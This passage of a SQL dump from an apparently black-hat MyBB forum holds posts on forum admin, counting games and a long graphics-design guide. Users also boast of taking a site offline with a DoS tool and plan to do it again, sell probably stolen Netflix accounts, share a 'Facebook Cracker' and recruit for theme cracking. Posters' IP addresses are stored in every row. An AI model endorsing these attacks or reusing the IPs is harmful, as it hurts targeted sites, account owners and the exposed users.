'273fa421431e55dea3ed633eedcb9a43', '0', '0'); INSERT INTO mybb_posts VALUES('1108', '254', '1107', '49', 'RE: Gamers Section', '0', '61', 'NXK', '1346047158', 'There\'s one in the making. Be patient.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '14ea141a1c224e68b44d5705bef827e5', '0', '0'); INSERT INTO mybb_posts VALUES('1109', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '61', 'NXK', '1346047968', 'If you have a Canadian account let me know good sir, I can\'t use USA ones.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e95233f25fe6cf9549bffaa7c1d4dc1d', '0', '0'); INSERT INTO mybb_posts VALUES('1110', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346054633', 'It was not made in gamemaker. Hovercatz doesnt have a clue.', '46.245.145.130', '787845506', '1', '0', '0', '0', '1', '09d6759f39165bce31a2dc3c6ce26df0', '0', '0'); INSERT INTO mybb_posts VALUES('1111', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '62', 'R?????zo?', '1346067131', 'Anyone getting this error?\r\n[spoiler][img]http://i.imgur.com/q7v3E.png[/img]\r\n\r\nI\'m on windows 7 x64bit[/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '250103c537f8a824c8eb8ff2f1b57be7', '0', '0'); INSERT INTO mybb_posts VALUES('1112', '253', '1106', '56', 'RE: Count to 200', '0', '67', 'HoverCatz', '1346073272', '2. Does it reset when a staff posts?', '85.165.36.95', '1436886111', '1', '0', '67', '1346073281', '1', 'e98b5f011d43325a04e618f86d946d5a', '0', '1346073281'); INSERT INTO mybb_posts VALUES('1113', '239', '1022', '7', 'RE: 1000th Post', '0', '67', 'HoverCatz', '1346073369', 'Yes sir it does', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b88d956a32ad59f57fc75966bc435bf7', '0', '0'); INSERT INTO mybb_posts VALUES('1114', '29', '996', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1346073489', '[quote=\'iTzIpod\' pid=\'996\' dateline=\'1345949449\']\r\nSeems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao\r\n[hr]\r\nEDIT: Works! t3h jok3r I did it! :D\r\n\r\n\r\n\r\n[img]http://i.imgur.com/4axu8.png[/img]\r\n\r\nWoot\r\n\r\n\r\nEDIT: t3h jok3r. It came back on after 3 minutes.. -.-\r\n[/quote]\r\n\r\nCongratz on the knock down.\r\n\r\nIt came back up because after the site went down, the packets stopped hitting TP. So it came back up because there were no incoming attacks to keep it down.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '5ec39f9e442038fa101a752fc9f5dad3', '0', '0'); INSERT INTO mybb_posts VALUES('1115', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1346073579', 'Uhh OK. Well nice contribution.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '8b6e6209bb4ab826d95173478a3324d4', '0', '0'); INSERT INTO mybb_posts VALUES('1116', '163', '1111', '30', 'RE: [REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1346073818', '[quote=\'R?????zo?\' pid=\'1111\' dateline=\'1346067131\']\r\nAnyone getting this error?\r\n[spoiler][img]http://i.imgur.com/q7v3E.png[/img]\r\n\r\nI\'m on windows 7 x64bit[/spoiler]\r\n[/quote]\r\n\r\nDownload this http://www.mediafire.com/?455m8126fwc2fb9\r\n\r\nThat\'s all DLL/OCXs you would need for hacking/cracking. \r\n\r\nYou basically missing a file which helps run the program.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '81a51985893209df389471388cd4aa3e', '0', '0'); INSERT INTO mybb_posts VALUES('1117', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346073904', '3. No it doesn\'t. Also all posts without a number or wrong number should be reported :D', '41.151.156.103', '697801831', '1', '0', '1', '1346077838', '1', 'e3f5fef8bcf80a36faf271fba57231a2', '0', '1346077838'); INSERT INTO mybb_posts VALUES('1118', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1346073947', '/me meant to say dick not fishs dick.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '59405f34f7c1ec34b9276e1d7961b455', '0', '0'); INSERT INTO mybb_posts VALUES('1119', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346073975', 'Banned for having 23 positive reps.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '27b78f46438847489c05f3f32bcd2265', '0', '0'); INSERT INTO mybb_posts VALUES('1120', '164', '1104', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1346074072', '[quote=\'Thunder™\' pid=\'1104\' dateline=\'1346045322\']\r\nGrey looks to dull for elites.\r\n[/quote]\r\n\r\nTaken under consideration.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '3b03ba357545ffdaa57ebdd8be7e703d', '0', '0'); INSERT INTO mybb_posts VALUES('1122', '233', '1091', '58', 'RE: Reviewers Group???', '0', '1', 't3h jok3r', '1346074485', '[quote=\'Apathy\' pid=\'1091\' dateline=\'1346026572\']\n[quote=\'t3h jok3r\' pid=\'1078\' dateline=\'1346016300\']\nYou guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus.\n[/quote]\n\nMe. I was the reviewers leader on a different bh site. (now closed) and get in skype.\n[/quote]\n\nWhat the fuck is your problem? You want to discuss something, you PM me about it and don\'t act like the boss. I promoted iTzIpod because he deserved it and I [b]discussed[/b] it with a online Mod. We have a huge time difference and I told over 6 times that I have a slow internet connection and can\'t use SKYPE.\n\n\n[b]Edited[/b]\n\nBy the way, what did you say in the PM \"I thought we were on a team\", I thought we were. Last time I checked, I asked you to change your usertitle and do something else which will promote LH, you replied back saying you will but did you actually do it? NO.\n\nYou wana have attitude with me, I will have attitude with you. iTzIpod is always chatting with me because I know him from another forum so he is more comfortable chatting with me than chatting with others regarding issues of LH.', '41.151.156.103', '697801831', '1', '0', '1', '1346074923', '1', 'dbcf453495bcbc803b30c5428d766301', '0', '1346074923'); INSERT INTO mybb_posts VALUES('1123', '200', '1100', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1346074516', '[quote=\'iTzIpod\' pid=\'1100\' dateline=\'1346036935\']\r\n[quote=\'t3h jok3r\' pid=\'1087\' dateline=\'1346018077\']\r\n[quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\']\r\n[quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\']\r\n[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\']\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.\r\n[/quote]\r\n\r\nIt\'s :opps:\r\n\r\nUmmm :thinking:\r\n\r\nPortable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.\r\n[/quote]\r\n\r\nIt\'s the normal Adobe Photoshop CS6 :p \r\n\r\nPortable takes up less space. That\'s why I want to get portable.\r\n[/quote]\r\n\r\nYou sure it\'s CS6? In the title it says CS5.\r\n[/quote]\r\n\r\nWhoops :/ Made a typo. I wrote that on my Mobile.\r\n[/quote]\r\n\r\nLol It\'s OK, I do the same thing when I\'m on my iDevice.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '9736237ec7b9b0f407252910003631c2', '0', '0'); INSERT INTO mybb_posts VALUES('1124', '240', '1094', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346074606', '[quote=\'iTzIpod\' pid=\'1094\' dateline=\'1346032320\']\r\n[quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\']\r\nThanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads.\r\n\r\nMods can see it I think, because they are moderating that forum.\r\n[/quote]\r\n\r\nI can\'t see any threads in there now.\r\n[/quote]\r\n\r\nUmm, Did you create any threads there?', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '377ab5baffb7d369abdc56d503f2f757', '0', '0'); INSERT INTO mybb_posts VALUES('1125', '251', '1063', '19', '[Junk]sig', '0', '1', 't3h jok3r', '1346074969', 'This thread has been junked.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('1128', '195', '1109', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1346077913', '[quote=\'NXK\' pid=\'1109\' dateline=\'1346047968\']\r\nIf you have a Canadian account let me know good sir, I can\'t use USA ones.\r\n[/quote]\r\n\r\nI have both Canadian and USA accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66c34273ec31a66ec5713bbc3fa76edd', '0', '0'); INSERT INTO mybb_posts VALUES('1127', '253', '1126', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346077891', '[quote=\'HoverCatz\' pid=\'1126\' dateline=\'1346076138\']\r\n3. Okay ;)\r\n[/quote]\r\n\r\n4. Made a mistake. LOL thanks for reporting me [b]BUT[/b] LQP not accepted.', '41.150.193.35', '697745699', '1', '0', '0', '0', '1', 'b5fb1aa5586cddc6d9bd1da3ec0b251a', '0', '0'); INSERT INTO mybb_posts VALUES('1129', '253', '1106', '56', 'RE: Count to 200', '0', '67', 'HoverCatz', '1346078333', '5. Double Post :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '783e186c59835a23d4f0eb0f3120d18e', '0', '0'); INSERT INTO mybb_posts VALUES('1130', '253', '1106', '56', 'RE: Count to 200', '0', '20', 'JakeUS', '1346078566', 'Six, gotta love these threads.\n\n;)', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '142dee43e1668f3dd622fe9e830b2789', '0', '0'); INSERT INTO mybb_posts VALUES('1131', '213', '1105', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1346078654', '[quote=\'Thunder™\' pid=\'1105\' dateline=\'1346045493\']\nI would Love to see Gamers Group.\n[/quote]\nI think NXK is making a Gamers Group.', '24.212.197.164', '416597412', '1', '0', '82', '1346078689', '1', '30afa1dbe0c43196324f82fa58b78457', '0', '1346078689'); INSERT INTO mybb_posts VALUES('1132', '191', '666', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346079186', 'Can you teach me how to use this? :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2238786ee6c02129ed243a3790de2a7f', '0', '0'); INSERT INTO mybb_posts VALUES('1133', '29', '1114', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '82', 'iTzIpod', '1346079266', '[quote=\'t3h jok3r\' pid=\'1114\' dateline=\'1346073489\']\r\n[quote=\'iTzIpod\' pid=\'996\' dateline=\'1345949449\']\r\nSeems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao\r\n[hr]\r\nEDIT: Works! t3h jok3r I did it! :D\r\n\r\n\r\n\r\n[img]http://i.imgur.com/4axu8.png[/img]\r\n\r\nWoot\r\n\r\n\r\nEDIT: t3h jok3r. It came back on after 3 minutes.. -.-\r\n[/quote]\r\n\r\nCongratz on the knock down.\r\n\r\nIt came back up because after the site went down, the packets stopped hitting TP. So it came back up because there were no incoming attacks to keep it down.\r\n[/quote]\r\n\r\nOh that explains it. I guess I will do it again for the lulz.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e08e0096bc590235c7befdeb8128c537', '0', '0'); INSERT INTO mybb_posts VALUES('1134', '207', '1073', '3', 'RE: Suggest awards and apply for awards', '0', '82', 'iTzIpod', '1346079447', '[quote=\'t3h jok3r\' pid=\'1073\' dateline=\'1346015422\']\r\nI honestly don\'t think the trusted award is the best thing to implement, because some people will act decent till they get the award then scam members like shit.\r\n[/quote]\r\n\r\nTrue. Oh well. I\'ll erase that from the list then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ac4b853acb27e6a440253185c6c959f', '0', '0'); INSERT INTO mybb_posts VALUES('1135', '240', '1124', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1346079560', '[quote=\'t3h jok3r\' pid=\'1124\' dateline=\'1346074606\']\r\n[quote=\'iTzIpod\' pid=\'1094\' dateline=\'1346032320\']\r\n[quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\']\r\nThanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads.\r\n\r\nMods can see it I think, because they are moderating that forum.\r\n[/quote]\r\n\r\nI can\'t see any threads in there now.\r\n[/quote]\r\n\r\nUmm, Did you create any threads there?\r\n[/quote]\r\n\r\nNo. But since I am a Mod, doesn\'t that allow me to view the threads since the section is Moderated by Moderators?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa470455cf230bb0f93d551f0e6c713e', '0', '0'); INSERT INTO mybb_posts VALUES('1136', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346079794', '/me makes the O_o face.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b51ef096f3ed05131088e6c7b2ce4862', '0', '0'); INSERT INTO mybb_posts VALUES('1137', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346079852', 'Banned for being an excellent Admin (t3h jok3r)', '24.212.197.164', '416597412', '1', '0', '82', '1346094144', '1', 'aa58036cd9835cd761299a47cd6e45b7', '0', '1346094144'); INSERT INTO mybb_posts VALUES('1138', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346079894', '7. Like le boss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e06132090076b56a46ceebf19b7db28f', '0', '0'); INSERT INTO mybb_posts VALUES('1139', '256', '0', '3', '[Bug] View New Posts', '0', '82', 'iTzIpod', '1346082742', 'When you click on the \"View New Posts\" \r\nYou will get this error.\r\n\r\n\r\nSorry, but no results were returned using the query information you provided. Please redefine your search terms and try again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8ef11ff697a90f775d8bab3de6ab5035', '0', '0'); INSERT INTO mybb_posts VALUES('1140', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '112', '??????Z', '1346084890', 'can i get a copy please pal ? thanks', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', '2906c08ad810013f0827dee436bc7c9d', '0', '0'); INSERT INTO mybb_posts VALUES('1141', '257', '0', '35', 'Nice Video Edit', '0', '82', 'iTzIpod', '1346084981', '[video=youtube]http://www.youtube.com/watch?v=ktltmaiR4dc[/video]\r\n\r\n\r\nEnjoy! =]\r\n\r\nThis is a PS3 CoD Clan. My brother is in it ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be1e2d23464096aec862df6609fc76e7', '0', '0'); INSERT INTO mybb_posts VALUES('1142', '258', '0', '58', 'Recurring Team now...', '0', '54', 'Sin Cara', '1346085425', 'Hello,\r\n\r\nI m going to crack some premium/custom mybb themes so that\'s why i m recurring the crack team. Everyone can apply here.\r\n\r\n[color=#006400][u][b]Basic Requirements:[/b][/u][/color]\r\n\r\n1:- Have Knowledge of .css\r\n2:- Have Knowledge of html\r\n3:- Have knowledge of basic php\r\n\r\n[color=#006400][u][b]Apply Now..![/b][/u][/color]\r\n\r\n[color=#C71585][b]Your Name:\r\nYour age :\r\nYou experience on mybb:\r\nYou modification of mybb(Show some proofs):[/b][/color]\r\n\r\n[color=#FF0000][b]Note:[/b][/color] [color=#DAA520]This is not official. [/color]', '119.154.14.251', '2006585083', '1', '0', '54', '1346085973', '1', '904727ee9c100d057908afdbfd19218e', '0', '1346085973'); INSERT INTO mybb_posts VALUES('1143', '112', '1140', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346085526', '[quote=\'Kennerz\' pid=\'1140\' dateline=\'1346084890\']\r\ncan i get a copy please pal ? thanks\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '119.154.14.251', '2006585083', '1', '0', '0', '0', '1', '5f38f6e06672279475903e62062e32ea', '0', '0'); INSERT INTO mybb_posts VALUES('1144', '253', '1106', '56', 'RE: Count to 200', '0', '84', 'Thunder™', '1346089021', '8. Boss is Here :) :P \n\n\n\n\n_-_', '111.91.95.99', '1868259171', '0', '0', '0', '0', '1', '38b3ab56e5fef10fdf25929ccd790a8b', '0', '0'); INSERT INTO mybb_posts VALUES('1145', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346090920', '9. Thunder I like how you started this thread on TP and LH xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2af7ee11d06f73d4f514e4489ee5e844', '0', '0'); INSERT INTO mybb_posts VALUES('1146', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346092339', 'Banned for thanks.', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', '053c89e14317c1100de8eaecae272ce0', '0', '0'); INSERT INTO mybb_posts VALUES('1147', '259', '0', '34', 'Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346093539', '[B]All credits go to Instant of the BattleOn forums: [/B][url=http://forums2.battleon.com/f/tm.asp?m=18574828]Instant\'s GFX Guide[/url]\n\nIf you see any Good Resources or anything Missing that should be added, PM me or Post \n\n\n[B][U]GFX Terms[/U][/B]\n[B]Sig-[/B]Also Known As Signature \n\n\n[B]Gfx-[/B] Also Known As Graphics \n\n\n[B]Gfx-ers-[/B]Also Known As Graphic Designers\n\n\n[B]Render-[/B] A pre-cut image from a wallpaper or other image commonly used in signatures.\n\n\n[B]Stock-[/B] Any un-cut image. Such as photography or a wallpaper.\n\n\n[B]Sprite-[/B] A render of a pixilized character. Such as ASH from the gameboy pokemon or Ryu from the SNES Street Fighter. Can be any pixelized character.\n\n\n[B]Focal/Focal Point-[/B] The main part of the signature/LP that people see. Most of the time it\'s your stock or render.\n\n\n[B]Blending-[/B] How well the Render has been fitted/matched with the background. Also how the edges of the render flow into the background.\n\n\n[B]Flow-[/B] The overall direction of the sig. \n\n\n[B]Chaotic-[/B] Too much is going on in the Signature and it is very hard to make out.\n\n\n[B]Vomit-[/B] A bad sig rating\n\n\n[B]Brush-[/B] A downloaded brush from another site commonly used to make sigs. It is used as a tool to create backgrounds.\n\n\n[B]Brightness/Contrast-[/B] Change the settings of your brightness and contrast in your monitor......... notice the difference thats what its referring to. When its over contrasted it means that your contrast is way overboard and it has too much excessive dark spots/black or white light spots.\n\n\n[B]C4D-[/B] An abstract render made in a program called Cinema 4D, also commonly used in sigs.\n\n\n[B]Whored-[/B] Excessive usage of a very beginner tool or such.\n\n\n[B]Pack-[/B] A collection of stuff.\n\n\n[B]Font-[/B] A different style of text.\n\n\n[B]Pixel Stretch-[/B] A simple sig technique using 1px by \"x[vertical wise\" of an image and stretching it across the width of the sig.\n\n\n[B]Blurred-[/B] Blurring duh....you know when it gets fuzzy. It\'s used for adding depth.\n\n\n[B]Sharpen-[/B]This tool is used to bring up the contents of your focal, by changing the quality to a more \"crisp\" like view.\n\n\n[B]Foreground-[/B] The front part in a signature, usually blurry, to signify it is \"too close\" for the lens, or the focus is not on it.\n\n\n[B]Middleground-[/B] The part of a signature/photo where the focus is, where the crisp render is, and where the focal point should be.\n\n\n[B]Background-[/B] The back part of the signature, usually blurry, or made to emphasise the focal point.\n\n\n[B]Focal point-[/B] the first point that the eye draws to, or looks at, in any piece of art. This is strongly affected by placement, depth, and sharpness.\n\n\n[B]Composition-[/B] How well your piece is put together. Anyone can throw a bunch of stuff onto a canvas and call it good. Not everyone can put it together to form a nice piece.\n\n\n[B]Ripping-[/B]Another word for plagerism. Claiming something of your own when in fact it is not your\'s.\n\n\n[B]Photo Manipulation/ Manip-[/B] Creating something that\'s almost surreal. Adding things that wern\'t there to begin with. (Hard to explain, I tried >< )\n\n\n[B]Typography-[/B] Pretty much anything that has to do with text.\n\n\n[B]B&W-[/B] Black and White.\n\n\n[B]DP-[/B] Digital Painting. Using programs to digitally paint something.\n\n\n[B]Lighting/Light Source - [/B]The main source of luminance in the canvas. Lighting makes the art piece brighter. Sometimes there can be more than one light source, while other times there are none.\n\n\n[B]Effects - [/B]These are the parts of the signature that make it appealing and aesthetic, they are designed to aid in the flow of the sig while assisting the focal in looking good.\n\n\n[B]Sketch & Toon - [/B]These are C4Ds that mimic a drawing or a vector.\n\n\n[B]Mechanical - [/B]These are C4Ds that look mechanical or robot-like. They are not as helpful in flow as abstract freehand splines, but they are very intricate and detailed.\n\n\n[B]Effect Abstracts - [/B]These are C4Ds that are transparent with definitive colors and lighting. They are most often used to aid in the effects around the focal.\n\n\n[B]HQ/LQ- [/B] HQ stands for high quality and LQ stands for low quality.\n\n\n[B]Rights:[/B] If you are given \"rights\" to a resource or a piece itself, below are what you can do with these \"rights\". Not including full rights, you may not use a resource or piece to post anywhere else, edit it, or claim it as your own. All rights must have original owner\'s credit with them. When a .psd file is involved you may not use any layers of the .psd for your own projects. Only the original owner can give any type of \"right\" to you unless someone else has full rights.\n\n\n[B]WR/ Wearing Rights:[/B] When you are given a gift from another member, you may wear the piece in your signature or avatar space.\n\n\n[B]LR/ LRO/ Learning Rights-[/B] This is for a resource given by another member. You may look at it to see what they did to give you ideas of your own.\n\n\n[B]PR/ Posting Rights-[/B] This is also for resources. This means you can repost the resource on other sites.\n\n\n[B]FR/ Full Rights-[/B] You can do whatever you want except claim it as your own. You can edit, repost, take layers from a .psd file, sell it, whatever you feel like you want to do.\n\n\n[B]something about depth as well:[/B]\nBlurring something away from the sig while sharpening the focal is an example of depth.\n\n\n[B]something about composition:[/B]\nThe fusion of lighting, depth and focal give the signature composition.\n\n\n\n\n\n\n\n\n[U][B]Other:[/B][/U]\n\n\n[B]LP - Large Piece.[/B]\n[B]Vector[/B]\n[B]Pentooling[/B]\n\n\n[B]Raster:[/B] An image entirely of individual pixels in a grid format. Most signatures are raster images.\n\n\n[B]Vector:[/B] The use of geometrical primitives such as points, lines, curves, and shapes or polygon(s), which are all based upon mathematical equations, to represent images in computer graphics. (Stolen from Wikipedia) To achieve a true vector, you must you a vector program such as Adobe Illustrator or Macromedia FreeHand. Photoshop does not produce true vectors. Most vector art is a compilation of shapes stacked on top of each other to form a whole.\n\n\n[B]Vexel:[/B] A word derived from \"vector\" and \"pixel\". It is an entirely raster based image that resembles vector style when at the correct zoom. When you zoom in, however, it will begin to look pixelated, just like any raster based image.\n\n\n[B]Pentooling:[/B] Using the pen tool, whether in photoshop or any other program that has one, to create lines, shapes, paths, etc. A pen tool uses vector formulas to encorporate lines, curves, and points into a path that can be filled with color to create a shape. The pen tool can also make curved lines, and gradients. Using the pen tool takes a little practice, but it\'s a lot more precise than brushing. The pen tool creates a nice, clean, solid shape.\n\n\n[B]Brushing:[/B] Using any of the brush tools in Photoshop to draw on a canvas, whether with a mouse, tablet, or some other method. Brushes are highly customizable, and can be used in a variety of ways. In comparison to the pen tool, brushing can add texture to a piece.\n\n\n[B]Expanding the definition of \"Depth\":[/B]\nDepth is the illusion of distance within a composition. There are several ways to do this. The most common, and easiest ways to do this in a signature are; to blur the background and sharpen the focal point, making the background darker, and others. Overlapping elements on a canvas, closer items in front of items farther away can create depth as well. Negative space, if used correctly, can make the focal appear much farther back in the piece. Making something bigger or smaller can effect how \"deep\" into the canvas it is, a big tree is closer than a small volcano.\n\n\n[B]Photo Manipulation:[/B]\nTaking a regular image and using editing techniques in order to create an illusion or deception. Like a regular picture would be some like some squeezing a sponge dry, Then the illusion of photo\'s drop nsted of water.\n\n\n[B][U]The Beginning[/U][/B]\nAlright, first off, you Need a Program. The Most common Programs used are Photoshop, and GIMP. Photoshop is very good and easier to navigate through stuff. But it is expensive. GIMP is free, and isn\'t as easy to navigate. You can get Photoshop [URL=http://adobe.com/\"]Here[/URL] and GIMP here [URL=http://gimp.org/\"]Here[/URL].Ok now that you have your GFXing programm you could start to make some tags or other art works, but i would suggest to download resources. Resources are mostly things other gfxers(sometimes already professional gfxers have created) and you can use for your own works. The resources that will be important for you at the start will be brushes, fonts and renders.\n[B]Some Good Sites:[/B] [URL=http://deviantART.com/\"]DeviantART[/URL] [URL=http://renders-graphiques.fr/\"]Renders-Graphiques[/URL] and [URL=http://dafont.com/\"]Dafont[/URL]\n[B]How to Install Brushes and Fonts?[/B]\n[U]GIMP[/U]: When you downloaded brushes/fonts search the main folder of your gimp programm, open that fodler. In that folder you will see a subfolder of Gimp that is called Brushes and a subfodler that is called fonts. Now you just take the brushes/fonts you downloaded and paste the downloaded bruhes in the subfolder brushes and the fonts you downloaded you paste in the subfolder fonts. Now you are able to use this brushes/fonts in Gimp.\n[U]Photoshop[/U]: When you download Brushes, just go to Program Files, then click on Adobe, and go down to Photoshop [Insert your version here], then click on presets and In there is a Brushes folder, just drag the brushes there. For Fonts its a bit tricker, Usually the fonts file is hidden, so you usually just have to go to Control Panel and make a shortcut on your desktop, open it, and drag the fonts there.\n\n\n[B][U]Types of GFX[/U][/B]\nTypography: [URL=http://fc08.deviantart.net/fs37/i/2010/090/3/b/Typography_by_fabianohikaru.jpg\"]click[/URL]\nGrunge: [URL=http://fc09.deviantart.net/fs25/f/2008/120/9/1/914c295cd99c5e3731a5c5483e8b09bb.jpg\"]click[/URL]\nVector: [URL=http://fc01.deviantart.net/fs32/f/2008/214/7/b/7b15dd6575ea3cde574e6fbca3a3a2af.jpg\"]click[/URL]\nAbstract: [URL=http://www.deviantart.com/download/62922313/Abstract_by_DanielPimentel.jpg\"]click[/URL]\nC4D: [URL=http://fc03.deviantart.net/fs37/i/2008/286/0/3/Blue_C4D_Wallpaper_by_Dan4ArChAnGeL.jpg\"]click[/URL]\nSmudge: [URL=http://fc03.deviantart.net/fs44/i/2009/095/a/5/Smudge_Brushes_by_kirby117.png\"]click[/URL]\n\n\n[B]Using C4Ds and Tools[/B][I]Note: Some may not be on GIMP[/I]\nC4D Usage: C4Ds are Usually used for Flow or to add Depth. An Average Sig using C4Ds is [URL=http://fc02.deviantart.net/fs70/f/2010/248/6/d/free_siggie_by_instantaneousfx-d2y41tt.png\"]This[/URL] But there are some GFXers who tend to do Pieces with Just C4D, which is Fine.\nPentool: Pentool is usually used for Shapes and Curves. More Expierienced GFXers like to use Pentool because they can shape it any way they want.\nMove Tool: Move tool allows you to move the Layer you are currently selecting. (does not work if layer is empty)\nMarquee Tool: Allows you select certain areas.\nLasso tool: Allows you to Select specific areas.\nCrop Tool: Allows you to crop out Areas of a Piece.\nEyedropper Tool: Allows you to Select a Certain color just by clicking on it not trying to find it Manually.\nBrush Tool: Allows you to brush of course.\nEraser Tool: Allows you to Erase.\nGradient Tool: allows you to make Gradient Maps or Overlays.\nBlur Tool: Blurs out Any unwanted sections, can also be used to create depth.\nSmudge Tool: Used many different ways, Blending, or just to make a Simple Smudge Piece.\nSharpen Tool: Sharpens the Image.\nDodge Tool: Makes Image Lighter.\nBurn Tool: Makes Image Darker.\nType Tool: Puts Text on your Image\nPath Selection Tool: Creates Paths for you.\nZoom Tool: allows you to Zoom in.\n\n\n[B][U]Rankings[/U][/B] \n\n\n[B]Low Novice\n[U]Novice[/U]\nHigh Novice[/B]\n\n\n[IMG]http://i647.photobucket.com/albums/uu191/nexolous/futuristic.png[/IMG]\nSomeone who Just started, Who doesn\'t Execute the Basics well, but Has an Idea of what they are.\n\n\n[B]Low Moderate\n[U]Moderate[/U]\nHigh Moderate[/B]\n\n\n[IMG]http://i257.photobucket.com/albums/hh233/RK-I-Logic/Sigs/bscopy.png[/IMG]\nSomeone who knows the basics but don\'t have some of them mastered just as yet, like composition. Work that show the appeal of having potential and know how to make something decent.\n\n\n[B]Low Intermediate\n[U]Intermediate[/U]\nHigh Intermediate[/B]\n\n\n[IMG]http://i156.photobucket.com/albums/t36/Prince_NSR/dazegift2.png[/IMG]\nSomeone who understands and knows the basics but still have minor problems. They know how to make their work appeal as the advantage by making their work more complex.\n\n\n[B]Low Semi-Professional\n[U]Semi-Professional[/U]\nHigh Semi-Professional[/B]\n\n\n[IMG]http://i17.photobucket.com/albums/b98/aaron_campbell187/ON_TV.png?t=1273090654[/IMG]\nSomeone who knows the basics and takes advantage of making their work unique with it\'s own variety of styles and complexity. \n\n\n[B]Low Professional\n[U]Professional[/U][/B]\n\n\n[IMG]http://i287.photobucket.com/albums/ll149/the_departed93/plus.jpg[/IMG]\nSomeone that has a unique style and practically have their work in flawless execution and appeal.\n\n\n[B][U]Resources[/U][/B]\n[B]Fonts[/B]\n- [URL=http://www.dafont.com/\"]Dafont[/URL]\n- [URL=http://www.1001freefonts.com/\"]1001 Free Fonts[/URL]\n- [URL=http://www.urbanfonts.com/\"]UrbanFonts[/URL]\n- [URL=http://www.fontfreak.com/\"]Font Freal[/URL]\n- [URL=http://www.ddfont.com/\"]Ddfont[/URL]\n- [URL=http://www.dingbatdepot.com/\"]Dingbat Depot[/URL]\n- [URL=http://www.typenow.net/\"]Type Now[/URL]\n- [URL=http://simplythebest.net/fonts/\"]Simply The Best[/URL]\n\n\n[B]Font Packs[/B]\n-[URL=http://alpine.brainkiller.be/Resources/fonts_collectedby_delta-visions.com.rar\"]1000 Fonts Pack[/URL]\n-[URL=http://alpine.brainkiller.be/Resources/fonts_selectedby_delta-visions.com.rar\"]Selected 56 Fonts[/URL]\n\n\n[B]C4D Packs[/B]\n- [URL=http://www.deviantart.com/download/138311439/Bioluminescence_C4D_Pack_by_clyzm.zip\"]Biolumine scene by clyzm[/URL]\n- [URL=http://rapidshare.com/files/89881066/P-Series.PNGs.Trans-BG.zip\"] P-Series C4D Pack [/URL]\n- [URL=http://rapidshare.com/files/89760534/C4D_Pack.rar\"] 3.2-use.pack [/URL]\n- 